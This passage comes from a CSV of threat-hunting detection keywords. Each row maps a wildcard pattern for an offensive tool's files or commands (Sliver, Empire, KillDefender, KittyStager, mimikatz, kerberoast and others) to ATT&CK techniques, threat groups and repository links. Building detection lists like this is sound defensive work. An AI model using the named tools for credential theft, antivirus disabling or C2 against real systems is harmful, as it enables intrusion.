adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kick-operator -n *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*killAllNimplants*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*killav.py*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*killdefender check*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*killdefender kill*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","0","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*KillDefender.h*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*KillDefender.x64*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*KillDefender.x64.*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*KillDefender_BOF*","offensive_tool_keyword","cobaltstrike","Beacon Object File implementation of pwn1sher's KillDefender","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KillDefender_BOF","1","1","N/A","10","10","50","16","2022-06-28T15:54:15Z","2022-02-11T07:03:59Z" +"*killdefender_bof*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*KillDefenderBOF-main*","offensive_tool_keyword","KillDefenderBOF","KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender","T1055.002 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/Cerbersec/KillDefenderBOF","1","1","N/A","10","3","200","29","2022-04-12T17:45:50Z","2022-02-06T21:59:03Z" +"*Killed running eventvwr*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-EventVwrBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Killed running sdclt*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-SDCLTBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*kill-implant*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*killprocess.py*","offensive_tool_keyword","mythic","Cross-platform post-exploitation HTTP Command & Control agent written in golang","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/merlin","1","1","N/A","10","10","58","10","2023-08-11T15:02:23Z","2021-01-25T12:36:46Z" +"*kimi_MDPC/kimi.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*kindloader.exe* --extract kindlocker*","greyware_tool_keyword","tir_blanc_holiseum","Ransomware simulation","T1486 - T1204 - T1027 - T1059","TA0040 - TA0002 - TA0005","N/A","N/A","Ransomware","https://www.holiseum.com/services/auditer/tir-a-blanc-ransomware","1","0","N/A","4","6","N/A","N/A","N/A","N/A" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kintercept.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*kirbi_to_hashcat.py*","offensive_tool_keyword","Timeroast","Timeroasting takes advantage of Windows NTP authentication mechanism allowing unauthenticated attackers to effectively request a password hash of any computer or trust account by sending an NTP request with that account's RID","T1558.003 - T1059.003 - T1078.004","TA0006 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/SecuraBV/Timeroast","1","1","N/A","10","2","152","16","2023-07-04T07:12:57Z","2023-01-18T09:04:05Z" +"*kirbi2john.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kirbi2john.py*","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Credential Access","https://github.com/nidem/kerberoast","1","1","N/A","N/A","10","1282","313","2022-12-31T17:17:28Z","2014-09-22T14:46:49Z" +"*kirbikator.exe*","offensive_tool_keyword","kekeo","access the LSA (Local Security Authority) and manipulate Kerberos tickets. potentially allowing adversaries to gain unauthorized access to Active Directory resources and CIFS file shares","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/gentilkiwi/kekeo","1","1","N/A","N/A","10","1277","216","2021-12-14T10:56:48Z","2015-01-13T21:24:09Z" +"*kite03/echoac-poc*","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","8","2","118","25","2023-08-03T04:09:38Z","2023-06-28T00:52:22Z" +"*kitrap0d.x86.dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitrap0d_payload*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*kitten.dll*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten/basicKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kitten_test.go*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*kittens/bananaKitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kittielocal -*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","0","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*KittyStager -*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ?*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager ??*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager.git*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/cmd*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/internal*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*KittyStager/kitten*","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","1","N/A","10","10","176","35","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z" +"*Kiwi Legit Printer*","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets. keyword taken from hayabusa-rules win_alert_mimikatz_keywords.yml","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/gentilkiwi/mimikatz","1","0","N/A","10","10","17801","3446","2023-08-03T09:01:21Z","2014-04-06T18:30:02Z" +"*KIWI_CLOUDAP_LOGON_LIST_ENTRY_21H2*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*klezVirus/CheeseTools*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*klezVirus/inceptor*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*klezVirus/SilentMoonwalk*","offensive_tool_keyword","SilentMoonwalk","PoC Implementation of a fully dynamic call stack spoofer","T1055 - T1055.012 - T1562 - T1562.001 - T1070 - T1070.004","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/klezVirus/SilentMoonwalk","1","1","N/A","9","6","507","84","2022-12-08T10:01:41Z","2022-12-04T13:30:33Z" +"*klnkiajpmpkkkgpgbogmcgfjhdoljacg*","greyware_tool_keyword","Free VPN for Chrome","External VPN usage within 